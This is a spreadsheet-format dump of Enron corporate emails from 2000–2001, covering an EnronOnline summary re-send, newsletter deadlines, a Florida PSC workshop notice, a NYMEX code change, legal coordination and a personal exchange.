deBoisblanc Denny/ENRON@enronXgate, Jim Fallon/Enron Communications@Enron _x000D_
Communications, Joe Gold/LON/ECT@ECT, John L Nowlan/HOU/ECT@ECT, John _x000D_
Sherriff/LON/ECT@ECT, Joseph P Hirl/AP/ENRON@ENRON, Justin _x000D_
Rostant/ENRON@enronXgate, Kal Shah/ENRON@enronXgate, Karen _x000D_
Denne/Corp/Enron@ENRON, Kenneth Lay/Corp/Enron@ENRON, Kevin _x000D_
McGowan/ENRON@enronXgate, Kimberly Hillis/ENRON@enronXgate, Leonardo _x000D_
Pacheco/ENRON@enronXgate, Louise Kitchen/HOU/ECT@ECT, Lydia _x000D_
Cannon/ENRON@enronXgate, Mark E Haedicke/HOU/ECT@ECT, Mark _x000D_
Frevert/ENRON@enronXgate, Mark Koenig/Corp/Enron@ENRON, Mark S _x000D_
Palmer/ENRON@enronXgate, Mark Pickering/LON/ECT@ECT, Mark S _x000D_
Palmer/ENRON@enronXgate, Mark Taylor/HOU/ECT@ECT, Matt _x000D_
Motsinger/ENRON@enronXgate, Meredith Philipp/Corp/Enron@ENRON, Michael _x000D_
Bridges/ENRON@enronXgate, Michael Brown/ENRON@enronXgate, Mike _x000D_
McConnell/HOU/ECT@ECT, Paul Goddard/EU/Enron@Enron, Paul _x000D_
Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Paula Rieker/Enron _x000D_
Communications@Enron, Philippe A Bibi/ENRON@enronXgate, Rahil _x000D_
Jafry/ENRON@enronXgate, Raymond Bowen/ENRON@enronXgate, Richard _x000D_
Lewis/LON/ECT@ECT, Sally Beck/ENRON@enronXgate, Savita _x000D_
Puthigai/ENRON@enronXgate, Sheri Thomas/ENRON@enronXgate, Steven J _x000D_
Kean/NA/Enron@Enron, Sunil Abraham/ENRON@enronXgate, Tammie _x000D_
Schoppe/HOU/ECT@ECT, Thor Lien/OSL/ECT@ECT, Tim Belden/HOU/ECT@ECT, Tim R _x000D_
Jones/EU/Enron@Enron, Tina Spiller/ENRON@enronXgate, Torrey _x000D_
Moorer/ENRON@enronXgate, William S Bradford/ENRON@enronXgate, Debbie R _x000D_
Brackett/HOU/ECT@ECT, Jennifer Rosado/ENRON@enronXgate, Dawn _x000D_
McDonald/ENRON@enronXgate, Vance Meyer/NA/Enron@ENRON, Marc _x000D_
Eichmann/ENRON@enronXgate, Stephanie Segura/ENRON@enronXgate, Suresh _x000D_
Raghavan/ENRON@enronXgate_x000D_
cc:  _x000D_
Subject: EnronOnline Executive Summary for April 23, 2001_x000D_
_x000D_
This is a re-send._x000D_
I am experiencing e-mail problems._x000D_
Please let me know if you did not receive the summary._x000D_
_x000D_
Thanks for your patience._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  La rose, Simone  _x000D_
Sent: Tuesday, April 24, 2001 4:29 PM_x000D_
To: Johnson, Adam; Gosalia, Amita; Zipper, Andy; Crane Jr., Bob; Shults, Bob; _x000D_
Garner, Bruce; Deluca, Bryan; Baxter, Cliff; Diamond, Daniel; Reck, Daniel; _x000D_
Samuels, Dave; Forster, David; Thode, Eric; Mcclellan, George; Hermans, Greg; _x000D_
Whalley, Greg; Fitzgerald, Jay; Skilling, Jeff; Shankman, Jeffrey A.; _x000D_
McMahon, Jeffrey; Denny, Jennifer; Fallon, Jim; Gold, Joe; Nowlan, John; _x000D_
Sherriff, John; Hirl, Joseph; Rostant, Justin; Shah, Kal; Denne, Karen; Lay, _x000D_
Kenneth; Mcgowan, Kevin; Hillis, Kimberly; Pacheco, Leonardo; Kitchen, _x000D_
Louise; Cannon, Lydia; Haedicke, Mark; Frevert, Mark; Koenig, Mark; Palmer, _x000D_
Mark S.; Pickering, Mark; Palmer, Mark S.; Taylor, Mark; Motsinger, Matt; _x000D_
Philipp, Meredith; Bridges, Michael; Brown, Michael; McConnell, Mike; _x000D_
Goddard, Paul; Quilkey, Paul; Rieker, Paula; Bibi, Philippe A.; Jafry, Rahil; _x000D_
Bowen Jr., Raymond; Lewis, Richard; Beck, Sally; Puthigai, Savita; Thomas, _x000D_
Sheri; Kean, Steven; Abraham, Sunil; Schoppe, Tammie; Lien, Thor; Belden, _x000D_
Tim; Jones, Tim; Spiller, Tina; Moorer, Torrey; Bradford, William S.; _x000D_
Brackett, Debbie; Rosado, Jennifer; McDonald, Dawn; Meyer, Vance; Eichmann, _x000D_
Marc; Segura, Stephanie; Raghavan, Suresh_x000D_
Subject: EnronOnline Executive Summary for April 23, 2001_x000D_
_x000D_
Following please find the Daily EnronOnline Executive Summary._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 00:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michelle.vitrella@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'lucy.ortiz@enron.com', 'brian.redmond@enron.com', 'c.thompson@enron.com', 'heather.purcell@enron.com', 'stephen.douglas@enron.com', 'kevin.mcgowan@enron.com', 'janet.dietrich@enron.com', 'sally.beck@enron.com', 'chris.mahoney@enron.com', 'gary.hickerson@enron.com', 'cindy.skinner@enron.com', 'kathryn.corbally@enron.com', 'andrea.hauser@enron.com', 'patti.thompson@enron.com', 'cathy.phillips@enron.com', 'jeff.donahue@enron.com', 'jez.peters@enron.com', 'shanna.funkhouser@enron.com', 'scott.neal@enron.com', 'gary.taylor@enron.com', 'beth.perlman@enron.com', 'chris.connelly@enron.com', 'scott.tholan@enron.com', 'rick.bergsieker@enron.com', 'jeff.andrews@enron.com', 'marsha.schiller@enron.com', 'thomas.myers@enron.com', 'david.oxley@enron.com', 'mark.haedicke@enron.com', 'brent.price@enron.com', 'phillip.allen@enron.com', 'john.best@enron.com', 'larry.lawyer@enron.com', 'john.nowlan@enron.com', 'vince.kaminski@enron.com', 'chris.foster@enron.com', 'georgeanne.hodges@enron.com', 'christopher.calger@enron.com', 'max.yzaguirre@enron.com', 'hunter.shively@enron.com', 'alan.aronowitz@enron.com', 'w.duran@enron.com', 'eric.gonzales@enron.com', 'jennifer.fraser@enron.com', 'rob.milnthorp@enron.com', 'joseph.deffner@enron.com', 'daniel.reck@enron.com', 'john.arnold@enron.com', 'kevin.presto@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t>EnTouch Deadline</t>
  </si>
  <si>
    <t xml:space="preserve">            If your team would like to contribute to this week's newsletter, _x000D_
please submit your Business Highlight or Quote, by noon, Wednesday, December _x000D_
13. _x000D_
_x000D_
Thank you,_x000D_
Michelle Vitrella_x000D_
x39767</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 19:25:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff_dasovich@enron.com', 'psellers@haas.berkeley.edu', 'psellers@pacbell.net'})</t>
  </si>
  <si>
    <t>yUMMM</t>
  </si>
  <si>
    <t xml:space="preserve">I'm having some Dauffi - it sure is good_x000D_
_x000D_
Nancy_x000D_
(707) 251-4870 (phone)_x000D_
(707) 265-5446 (fax)_x000D_
"Plus je bois, mieux je chante"_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 10:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janelle.scheuer@enron.com', 'susan.landwehr@enron.com'})</t>
  </si>
  <si>
    <t>FPSC workshop on hedging and portfolio management next Monday</t>
  </si>
  <si>
    <t xml:space="preserve">Sue/Janelle:_x000D_
_x000D_
Steve Kean's pitch to the Florida PSC looks like it opened a "small crack" in _x000D_
the FL IOUs door.  I am trying to get Enron a slot  on the agenda.  I will _x000D_
advise tomorrow._x000D_
_x000D_
Marchris_x000D_
----- Forwarded by Marchris Robinson/NA/Enron on 05/07/2001 04:50 PM -----_x000D_
_x000D_
	"Natalie FUTCH" &lt;natalief@katzlaw.com&gt;_x000D_
	05/07/2001 04:39 PM_x000D_
		 _x000D_
		 To: &lt;Marchris.Robinson@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: FPSC workshop on hedging and portfolio management next Monday_x000D_
_x000D_
Marchris:_x000D_
_x000D_
We'll give you more information as we learn it._x000D_
_x000D_
On Friday, May 4, the FPSC issued a notice of a workshop on hedging and _x000D_
portfolio management (procurement of fuel for electric generation and end-use _x000D_
applications); to be held next Monday, 5/14/01, at 1:30 p.m. at the FPSC._x000D_
F_x000D_
 ind the notice at this link:_x000D_
_x000D_
http://www.psc.state.fl.us/dockets/documents/01/05688-01.html_x000D_
_x000D_
Find the agenda at this link (open with wordperfect viewer - let me know if _x000D_
you need me to cut and paste it into an e-mail)._x000D_
_x000D_
http://webserv1.electro-net.com/psc/Framer.Cfm?Link=rtowkshp.wpd_x000D_
_x000D_
The purpose of this meeting is to have presentations on this issue. _x000D_
_x000D_
Natalie_x000D_
_x000D_
Natalie B. Futch, associate_x000D_
Katz, Kutter, Haigler, Alderman, Bryant &amp; Yon, P.A._x000D_
106 E. College Avenue, Suite 1200_x000D_
Tallahassee, FL  32312_x000D_
(850) 224-9634 (phone)_x000D_
(850) 681-3218 (facsimile)_x000D_
www.katzlaw.com _x000D_
________________________________________x000D_
_x000D_
This transmission is intended to be delivered only to the named addressee(s)_x000D_
and may contain information that is confidential, proprietary, attorney_x000D_
work-product or attorney-client privileged.  If this information is received_x000D_
by anyone other than the named addressee(s), the recipient should_x000D_
immediately notify the sender by E-MAIL and by telephone (850) 224-9634 and_x000D_
obtain instructions as to the disposal of the transmitted material.  In no_x000D_
event shall this material be read, used, copied, reproduced, stored or_x000D_
retained by anyone other than the named addressee(s), except with the_x000D_
express consent of the sender or the named addressee(s).  Thank you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 02:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Unit contingent deals</t>
  </si>
  <si>
    <t>hi kate!_x000D_
there are some unit contingent deals from the 3rd that do not have the unit _x000D_
name in deal entry.  these are the deal numbers:_x000D_
568860_x000D_
568864_x000D_
568866_x000D_
thanks!_x000D_
Kim</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 05:26:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'keith.dodson@enron.com'})</t>
  </si>
  <si>
    <t>RE: Possible Move for Acct Dept</t>
  </si>
  <si>
    <t>I have been in discussions with them as well, and I don't think they have that flexibility.      Who has actually been working on the move for you?    I will have Pam Daily from my Admin Team contact you for specifics._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dodson, Keith  _x000D_
Sent:	Monday, October 22, 2001 3:56 PM_x000D_
To:	Hayslett, Rod_x000D_
Subject:	RE: Possible Move for Acct Dept_x000D_
_x000D_
Rod,_x000D_
_x000D_
Okay, we will plan to relocate them.  Property Service did come back and indicate they could wait until the end of November. We will see if they have any flexibility to accommodate early next year._x000D_
_x000D_
Keith_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayslett, Rod  _x000D_
Sent:	Monday, October 22, 2001 3:03 PM_x000D_
To:	Dodson, Keith_x000D_
Subject:	RE: Possible Move for Acct Dept_x000D_
_x000D_
We won't have a permanent place until sometime after the end of December._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dodson, Keith  _x000D_
Sent:	Monday, October 22, 2001 1:33 PM_x000D_
To:	Hayslett, Rod_x000D_
Subject:	FW: Possible Move for Acct Dept_x000D_
_x000D_
Rod,_x000D_
_x000D_
This is a good opportunity to make the consolidation we discussed last week.  Property Services is indicting the move needs to be completed in two weeks._x000D_
_x000D_
Keith Dodson_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Oliver, Marilyn  _x000D_
Sent:	Friday, October 19, 2001 4:14 PM_x000D_
To:	Reistetter, Steve_x000D_
Cc:	Dodson, Keith_x000D_
Subject:	Possible Move for Acct Dept_x000D_
_x000D_
Steve,_x000D_
_x000D_
Enron Property Services may need us to move Accounting from the 9th to the 8th floor - this is due to the relocation of personnel from 21&amp;22 to 9&amp;10.  They are to get back to me today or early next week with more details.  Do we know already or would it be possible to expedite the answer to Accounting's long term home from an organizational standpoint?  Depending on the answer maybe it would be possible to move them to their 'final' home now (if it is outside of EEOS) instead of moving them twice._x000D_
_x000D_
Please advise,_x000D_
Marilyn</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 04:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>your in</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 19:09:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>The Middle East  and US Policy: Notes on October 10, 2001, CERA_x000D_
 Client Call - CERA Alert</t>
  </si>
  <si>
    <t>_x000D_
Title: The Middle East  and US Policy: Notes on October 10, 2001, CERA Client Call 	_x000D_
URL(s):	_x000D_
_x000D_
http://www20.cera.com/eprofile?u=35&amp;m=2738;_x000D_
_x000D_
_x000D_
***********************************************************************_x000D_
_x000D_
THE MIDDLE  EAST AND US POLICY: NOTES ON  OCTOBER 10, 2001, CERA CLIENT CALL_x000D_
_x000D_
This Alert is a brief summary of the Global Energy Conference call that CERA _x000D_
held on October 10, 2001. The speakers were Vera de Ladoucette, Director of _x000D_
Middle East Research, and James Placke, CERA Senior Associate. _x000D_
_x000D_
*  Vera de Ladoucette addressed the political dynamics of the Middle East, by _x000D_
country, in the wake of the September 11 terrorist attacks._x000D_
_x000D_
*  James Placke discussed a perspective on the US agenda for the war on _x000D_
terrorism and outlined US goals and key elements of US strategic options._x000D_
_x000D_
_x000D_
**end**_x000D_
_x000D_
Follow above URL for complete Alert (3 printed pages)._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
E-mail Category: Alert                                             _x000D_
CERA Knowledge Area(s): Global Energy_x000D_
_x000D_
_x000D_
***********************************************************************_x000D_
***********************************************************************_x000D_
On September 17, CERA Chairman, Daniel Yergin, led a Global _x000D_
Client Conference Call discussion on the potential economic _x000D_
and energy industry fallout from the recent terrorist attacks _x000D_
on New York and Washington DC._x000D_
_x000D_
The playback of this conference call is now available at on the _x000D_
web at http://www.cera.com/highlights/teleconf_20010917/_x000D_
or via telephone at: 1-888-203-1112 (within the United States) _x000D_
or 719-457-0820 (outside the United States). Please use _x000D_
confirmation number 784004 to access the call playback. _x000D_
The playback is available until October 17, 2001. _x000D_
***********************************************************************_x000D_
***********************************************************************_x000D_
CERA's Autumn 2001 Roundtable event dates and agendas _x000D_
are now available at http://www20.cera.com/event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 _x000D_
from Cambridge Energy Research Associates, Inc. (CERA) which is _x000D_
confidential and may be privileged. Unauthorized disclosure, copying, _x000D_
distribution or use of the contents of this message or any attachments, _x000D_
in whole or in part, is strictly prohibited._x000D_
Terms of Use: http://www20.cera.com/tos_x000D_
Questions/Comments: webmaster@cera.com_x000D_
Copyright 2001. Cambridge Energy Research Associates</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 10:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'linda.w.humphrey@williams.com'})</t>
  </si>
  <si>
    <t>frozenset({'robert.s.checketts@wgp.twc.com', 'anna.gonzalez@mirant.com', 'billhogue@aec.ca', 'marvin.l.stevens@williams.com', 'steven.p.south@enron.com', 'johnson.rick@epenergy.com', 'ajangula@mtpower.com', 'clappertonj@energystore.net', 'tcarlson@apsc.com', 'gnunnema@utilicorp.com', 'carole.w.poulter@usa.conoco.com', 'jreames@br-inc.com', 'mdarienzo@avistaenergy.com', 'kris.ransom@avistacorp.com', 'brian.durning@pacificorp.com', 'chughes@gearyenergy.com', 'rkunz@idahopower.com', 'kwilkinson@br-inc.com', 'halbourlon@reliantenergy.com', 'linda.w.humphrey@wgp.twc.com', 'thomptn@texaco.com', 'skip_s_thevenot@reliantenergy.com', 'brandon.guderian@williams.com', 'mmbaker@duke-energy.com', 'kevin.coyle@cmenergy.com', 'ramperms@bp.com', 'carla.j.johnson@usa.conoco.com', 'nthomas@utilicorp.com', 'rita.l.williams@usa.conoco.com', 'rob_findlay@transalta.com', 'harp@powerspring.com', 'peter.f.richards@wgp.twc.com', 'kswett@tmvgas.com', 'troy.l.ruflin@wgp.twc.com', 'niels_a_vervloet@reliantenergy.com', 'hayesm@energystore.net', 'roneads@tristar-gas.com', 'chris_kelbert@transalta.com', 'steve_deanda@crosstimbers.com', 'sheslington@msn.com', 'nancyl@cybersurf.net', 'comforgd@igires.com', 'loriv@aurora-gas.com', 'rnelson@bfcden.com', 'carellyn-pitre@coastenergy.com', 'kbbaker@ppco.com', 'sreza@br-inc.com', 'david_m_huck@reliantenergy.com', 'dbarre@puget.com', 'mwp8246@idahopower.com', 'ngtsllc@fastlane.net', 'jwashabaugh@reliantenergy.com', 'dfox@westerngas.com', 'mreed@enserco.com', 'dbennett@centrabc.wei.org', 'sagardner@marathonoil.com', 'robs@usgt.com', 'dave_gartshore@transcanada.com', 'dmdluho@ppco.com', 'cmcgra@puget.com', 'jshadie@idahopower.com', 'michael.g.mori@williams.com', 'paul.gendron@neg.pge.com', 'jim.jameson@cabotog.com', 'fred.scott@engageenergy.com', 'mschulte@hsresources.com', 'abbyb@usgt.com', 'jelmore@eesinc.com', 'gary_o_weaver@dom.com', 'scotts@kimballenergy.com', 'gandhsj@texaco.com', 'dorothy_mersereau@br-inc.ca', 'lrobert@desc.dla.mil', 'hoffmamc@bp.com', 'cynthiab@panalberta.com', 'linda.richards@eprime.com', 'jeff.n.leishman@williams.com', 'jtracy@coral-energy.com', 'karen.v.peterson@williams.com', 'astant@sempratrading.com', 'kims@kimballenergy.com', 'cridin@puget.com', 'bgarrett@mtpower.com', 'png@orci.com', 'wayne.ellis@williams.com', 'johnru@qstr.com', 'rzemljak@mtpower.com', 'gastrdr@aol.com', 'dsuter@sempratrading.com', 'cchao@cook-inlet.com', 'scott.linkletter@neg.pge.com', 'john.hogan@southernenergy.com', 'david.woodbury@williams.com', 'kmorrow@bcgas.com', 'mgmtwilliams@aol.com', 'ryan.l.cox@williams.com', 'faizal_sharma@transalta.com', 'cschenderlein@brr.com', 'tdickers@westerngas.com', 'derekaberle@aec.ca', 'bblanar@coral-energy.com', 'bdahncke@pcenergy.com', 'davej@scana.com', 'djohnson@coral-energy.com', 'clark.w.mower@williams.com', 'djordan@coral-energy.com', 'mark@wasatchenergy.com', 'jmhasti@ppco.com', 'pcervin@br-inc.com', 'scheffsp@bp.com', 'bob.williams@cmenergy.com', 'mmaglier@utilicorp.com', 'swilson@idahopower.com', 'jhaake@national-fuel.com', 'dmyers@enserco.com', 'tbrother@utilicorp.com', 'cpentelichuk@txu.com', 'nfmc@idcomm.com', 'pwri@dynegy.com', 'murrata@texaco.com', 'mitravichr@epenergy.com', 'skatz@sempratrading.com', 'jdaly@cinergy.com', 'scotth@ngtsllc.com', 'robert.harp@cmenergy.com', 'stephanie.miller@enron.com'})</t>
  </si>
  <si>
    <t>All Shippers Notification: 01-236 - Soliciting electronic bids fo	r_x000D_
 available firm mainline transportation capacity on Northwest's Transmis_x000D_
	sion</t>
  </si>
  <si>
    <t xml:space="preserve"> - April 20 2001 01-236 Res_.doc</t>
  </si>
  <si>
    <t>Fri, 31 Aug 2001 12:23:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.kabel@enron.com', 'jonathan.schube@enron.com', 'tom.bruce-jones@enron.com', 'joern.schmidt@enron.com'})</t>
  </si>
  <si>
    <t>Weekly MArket Wrap_Pulp</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am the pulp analyst in Houston and I have been putting out a newsletter every week (usually on Fridays) with major news and some market analysis. Attached you will find two of the most recent of these newsletters._x000D_
_x000D_
If anyone is requiring further information    please feel free to contact those individuals from fundamentals listed in the report. If you don't wish to receive this, then please advise me and I will remove you from our distribution list.  _x000D_
_x000D_
Thanks,_x000D_
Monika Causholli_x000D_
Enron Industrial Markets_x000D_
(713) 807 1039 </t>
  </si>
  <si>
    <t>Tue, 25 Jan 2000 08:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Confidentiality Agreement Check</t>
  </si>
  <si>
    <t>Kay, Could you pull and send me copies of any Confidentiality Agreements any _x000D_
Enron entities have with the following companies:_x000D_
_x000D_
Bay Gas Storage_x000D_
Energy South_x000D_
_x000D_
Not sure what type of entities they are.  Let me know if you need any further _x000D_
information.  Thanks for your help.</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 09:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>(01-100) STRIP Code Changes on NYMEX ACCESSc</t>
  </si>
  <si>
    <t xml:space="preserve">Notice No. 01- 100_x000D_
March 21, 2001_x000D_
_x000D_
_x000D_
TO:_x000D_
All Exchange Members_x000D_
_x000D_
FROM:_x000D_
Neal Wolkoff, Executive Vice President_x000D_
_x000D_
SUBJECT:_x000D_
STRIP Code Changes on NYMEX ACCESSc_x000D_
_x000D_
_x000D_
Currently, the commodity codes CS and NS are used on NYMEX ACCESSc to trade _x000D_
Cinergy STRIPS and Entergy STRIPs respectively.  These codes are known only _x000D_
within the NYMEX ACCESSc system.  These codes have been approved to be used _x000D_
to trade WTI Calendar Swap and SoCal Basis Swap on enymexsm.  As a result, _x000D_
the NYMEX ACCESSc strip codes will be changed._x000D_
_x000D_
The following STRIP code changes will go into effect on Sunday, March 25th _x000D_
for trade date Monday, March 26th:_x000D_
_x000D_
Commodity Old STRIP Code New STRIP Code_x000D_
Cinergy              CS              CE_x000D_
Entergy              NS              NE_x000D_
_x000D_
Please call the NYMEX ACCESS Control Center (NACC) for further information at _x000D_
1-800-438-8616._x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=sara.shackleton@enron.com&amp;_x000D_
refdoc=(01-100)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 Aug 2000 10:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'erin.willis@enron.com', 'lisa.yoho@enron.com', 'ted.noble@enron.com', 'rshapiro@enron.com', 'sara.shackleton@enron.com', 'elsa.piekielniak@enron.com', 'gary.hickerson@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Sidley &amp; Austin</t>
  </si>
  <si>
    <t xml:space="preserve">We have tentatively planned for two partners from the Chicago law firm of _x000D_
Sidley &amp; Austin to come visit us in our offices on Friday, Aug. 11 and to _x000D_
give a presentation.  I say "tentatively" because I have not yet been able to _x000D_
confirm Mark Haedicke's availability on that date -- I will try to do that as _x000D_
soon as possible._x000D_
_x000D_
I would expect the presentation to take 1 to 2 hours -- I'm sure it could _x000D_
take longer if we wanted it to, i.e., if there turned out to be some matters _x000D_
that we wanted to discuss in further detail with them.  I think a morning _x000D_
meeting would suit most people's availability better than an afternoon one; _x000D_
please share your thoughts on this with me._x000D_
_x000D_
Enclosed is a rough outline of an agenda I have suggested to them for their _x000D_
presentation.  If there are other matters you would like to hear them _x000D_
discuss, I encourage you to let me know; I will pass all suggestions along to _x000D_
them._x000D_
_x000D_
As most of you probably know, attorneys have a duty of strict confidentiality _x000D_
to their clients, and this duty attaches from the moment a consultation _x000D_
begins (regardless of whether a formal "engagement" has commenced).  _x000D_
Violation of this duty is grounds for disciplinary action by the governing _x000D_
bar association.   On the other hand, I realize that we do not have an _x000D_
established relationship with this firm or these lawyers.  All of that being _x000D_
said, I will leave it to each of you as to your comfort level in asking _x000D_
particular questions or sharing particular information._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 05:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>NGX/CEL - Alberta Indices - Morgan Stanley</t>
  </si>
  <si>
    <t xml:space="preserve"> Janice:  Would you please follow up on this with Bill McCoy.  Mark_x000D_
----- Forwarded by Mark E Haedicke/HOU/ECT on 12/07/2000 01:26 PM -----_x000D_
_x000D_
	Peter Keohane_x000D_
	12/06/2000 04:54 PM_x000D_
		 _x000D_
		 To: John J Lavorato/Corp/Enron@Enron, Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: Sharon Crawford/CAL/ECT@ECT, Robert.Anderson@Blakes.com, _x000D_
Dalton.McGrath@Blakes.com_x000D_
		 Subject: NGX/CEL - Alberta Indices - Morgan Stanley_x000D_
_x000D_
We were unable to convince Morgan Stanley's counsel to provide the Affidavit _x000D_
in support of our position by the noon deadline today.  He said that although _x000D_
the traders were OK, he needed to track down internal approvals over the next _x000D_
few days.  Notwithstanding the deadline, it would still be extremely helpful _x000D_
to our case if we received the Affidavit over the next couple of days.  We _x000D_
would file the Affidavit, and deal with the judge, hopefully convincing him _x000D_
to allow the Affidavit notwithstanding the deadlines he established (there is _x000D_
a good likelihood he would do so).  As mentioned it would be very helpful if _x000D_
we weren't the only party advocating the need for a comprehensive index _x000D_
before the judge.  Accordingly, if you have any residual pressure to bear on _x000D_
MS, it would be greatly appreciated._x000D_
_x000D_
Peter.</t>
  </si>
  <si>
    <t>Fri, 23 Nov 2001 13:37:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jfagan@hewm.com'})</t>
  </si>
  <si>
    <t>Third Set of Discovery Requests of the California Parties to Mira_x000D_
              nt</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Third Set of Discovery Requests of the California Parties to Mirant.  Hard copies are being sent to the restricted service list._x000D_
 _x000D_
Joseph H. Fagan _x000D_
ATTORNEY _x000D_
HellerEhrman _x000D_
tel.:  202.912.2162 _x000D_
fax:  202.912.2020 _x000D_
e-mail:  jfagan@hewm.com _x000D_
web:  http://www.hewm.com_x000D_
 - Third Set of Discovey - Mirant.rtf _x000D_
 - Third Set Transmittal - Mirant.rtf </t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 04:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ISDA 16th AGM</t>
  </si>
  <si>
    <t>j_x000D_
----- Forwarded by Mark E Haedicke/HOU/ECT on 04/02/2001 11:38 AM -----_x000D_
_x000D_
	Rosemary Ryan &lt;RRYAN@isda.org&gt;_x000D_
	03/31/2001 09:53 AM_x000D_
		 _x000D_
		 To: "'alan.aronowitz@enron.com'" &lt;alan.aronowitz@enron.com&gt;, _x000D_
"'martin.chavez@kiodex.com'" &lt;martin.chavez@kiodex.com&gt;, _x000D_
"'LClemmons@elementre.com'" &lt;LClemmons@elementre.com&gt;_x000D_
		 cc: Mark Haedicke &lt;Mark.E.Haedicke@enron.com&gt;_x000D_
		 Subject: ISDA 16th AGM_x000D_
_x000D_
_x000D_
A quick note to remind you of the location of ISDA's 16th AGM and the time_x000D_
for your presentation._x000D_
_x000D_
Presentation time:   Developing Products_x000D_
   Thursday, April 5 at 2:15 PM_x000D_
_x000D_
_x000D_
Meeting Location: Omni Shoreham Hotel_x000D_
   2500 Calvert Street, NW_x000D_
   Washington, D.C. 20008_x000D_
   Phone:  202 234 0700_x000D_
_x000D_
_x000D_
I have attached the final agenda for your information._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Thanks and regards,_x000D_
_x000D_
Rosemary_x000D_
212 332 2555_x000D_
 &lt;&lt;Final AGM agenda 3.30.01.doc&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
 - Final AGM agenda 3.30.01.doc</t>
  </si>
  <si>
    <t>Fri, 24 Aug 2001 13:22:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'holly.fuller@elpaso.com'})</t>
  </si>
  <si>
    <t>frozenset({'robert.benson@enron.com'})</t>
  </si>
  <si>
    <t>RE: What up ?</t>
  </si>
  <si>
    <t>Hey Rob!  No problem about the phone call.  Everything worked out fine.  I'm_x000D_
going to Las Vegas next week, so we'll have to get together some time after_x000D_
next week.  It's great to hear from you.  Have fun this weekend!  Holly_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Robert.Benson@enron.com [SMTP:Robert.Benson@enron.com]_x000D_
&gt; Sent:	Friday, August 24, 2001 1:25 PM_x000D_
&gt; To:	Fuller, Holly_x000D_
&gt; Subject:	RE: What up ?_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    -----Original Message-----_x000D_
&gt;    From:   "Fuller, Holly" &lt;Holly.Fuller@ElPaso.com&gt;@ENRON_x000D_
&gt;_x000D_
&gt; [mailto:IMCEANOTES-+22Fuller+2C+20Holly+22+20+3CHolly+2EFuller+40ElPaso+2E_x000D_
&gt; com+3E+40ENRON@ENRON.com]_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    Sent:   Monday, July 30, 2001 3:29 PM_x000D_
&gt;    To:     Benson, Robert_x000D_
&gt;    Subject:  RE: What up ?_x000D_
&gt;_x000D_
&gt;    Hey Rob, sorry if I sounded a little weird on the phone the other_x000D_
&gt; night._x000D_
&gt;    My_x000D_
&gt;    boyfriend and I were in the middle of a really heavy discussion when_x000D_
&gt; you_x000D_
&gt;    called.  He was standing right by me, (upset with me), so it was a_x000D_
&gt;    little_x000D_
&gt;    awkward.  It was great to hear from you and I'd still like to meet you_x000D_
&gt;    for a_x000D_
&gt;    drink sometime after work.  Take care, Holly_x000D_
&gt;_x000D_
&gt;    [Benson, Robert]  Hey Holly, sorry it has taken me so long to get back_x000D_
&gt;    to you, I went back to Calgary for 10 days. Finally toke a vacation,_x000D_
&gt; I'm_x000D_
&gt;    glad you wrote back, I shouldn't have called on a Friday night. I hope_x000D_
&gt;    every thing worked out with your boyfriend. I'd love to get out with_x000D_
&gt;    you, how's next wed or thurs ? Talk to ya later, Rob_x000D_
&gt;    ******************************************************************_x000D_
&gt;    This email and any files transmitted with it from the ElPaso_x000D_
